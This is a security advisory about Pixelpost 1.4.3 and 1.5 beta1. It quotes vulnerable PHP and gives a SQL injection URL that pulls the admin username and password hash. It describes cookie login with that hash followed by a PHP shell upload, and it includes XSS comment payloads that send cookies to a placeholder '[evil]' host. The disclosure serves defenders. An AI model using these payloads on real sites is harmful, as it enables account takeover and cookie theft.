[UNIX] Pixelpost Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Pixelpost Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://www.pixelpost.org/> Pixelpost is "a photoblog application powered
by PHP and MySQL". Multiple vulnerabilities have been discovered in
Pixelpost, these vulnerabilities allow a remote attacker to cause the
product insert arbitrary SQL statements into existing ones, include HTML
and/or JavaScript into the pages it display, as well as disclose sensitive
information on the server.

DETAILS

Vulnerable Systems:
* Pixelpost version 1.4.3 and 1.5 beta1

1) SQL Injection in index.php
Vulnerable code:
magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[...]
if($_GET['showimage'] == "") {
$row = sql_array("select * from ". $pixelpost_db_prefix."pixelpost
where datetime<='$cdate' order by datetime DESC limit 0,1");
} else {
$row = sql_array("select * from
".$pixelpost_db_prefix."pixelpost where (id='".$_GET['showimage']."')");
}
if(!$row['image']) {
echo "Coming Soon! Nothing to show. No image to show here!";
exit;
}
$image_name = $row['image'];
$image_title = pullout($row['headline']);
$image_id = $row['id'];
$image_datetime = $row['datetime'];
[...]
==[ end index.php ]==========================

$showimage is the variable that is not properly sanitized (or not at all)
and it's on line 138 that we can get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we
have to fetch the data replacing the one that was supposed to be fetched.
So that $row[] is going to fetch what we specify and then print it on the
page.

With this vulnerability we can fetch almost any data from the database,
and from any tables.

Proof of Concept:
http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT
template%20as id,
%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as body,
%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM
pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and
below resides the md5 hash of the admin.

It's not necesarry to crack it since you can log in to the admin through a
cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files,
since file types or extensions are not checked.

So you can upload a PHP Shell or whatever. And depending on Server
Configuration gain system access.

2) System Configuration Disclosure
By default you can see the System Configuration by viewing:
http://[site]/[pixelpost_path]/includes/phpinfo.php

Vulnerable code:
==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.

3) Multiple SQL Injections in includes/functions.php
Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER
and HTTP_HOST

The script doesn't sanitize this variables at all in
includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[...]
function book_visitor($str)
{
// book a visitor
$datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 *
$cfgrow['timezone']));
$host = $_SERVER['HTTP_HOST'];
$referer = $_SERVER['HTTP_REFERER'];

// don't book a referer from self
$refererhost = parse_url($referer);
$refererhost = $refererhost['host'];
if($refererhost == $host)
{
$referer = "";
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$ruri = $_SERVER['REQUEST_URI'];
// ### if cookie lastvisit not set, count the people!
if(!isset($_COOKIE['lastvisit']))
{
$query = "insert into
$str(id,datetime,host,referer,ua,ip,ruri)

VALUES('NULL','$datetime','$host','$referer','$ua','$ip','$ruri')";
$result = mysql_query($query);
}
}
[...]
==[ end includes/functions.php ]==============================

4) Cross Site Scripting
You can perform a XSS attack when commenting a post because the comment,
the name, the url, and nor the email are properly sanitized.

Comment:
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/cookie.php?cookie='
document.cookie"> (Steal cookies)
<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and
probably all major browsers, but the user must click the link in order to
succed)
<a href="javascript:document.location='http://[evil]/cookie.php?cookie='
document.cookie">sarasa</a> (Steal cookies)

There are lots of things you can do with a bit of imagination.

The application was not fully tested and many other vulnerabilities are
probably present (Almost sure!)


ADDITIONAL INFORMATION

The information has been provided by <mailto:mr.knightmarex@xxxxxxxxx>
Knightmare.
The original article can be found at:
<http://www.neosecurityteam.net/index.php?action=advisories&id=19>
http://www.neosecurityteam.net/index.php?action=advisories&id=19



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages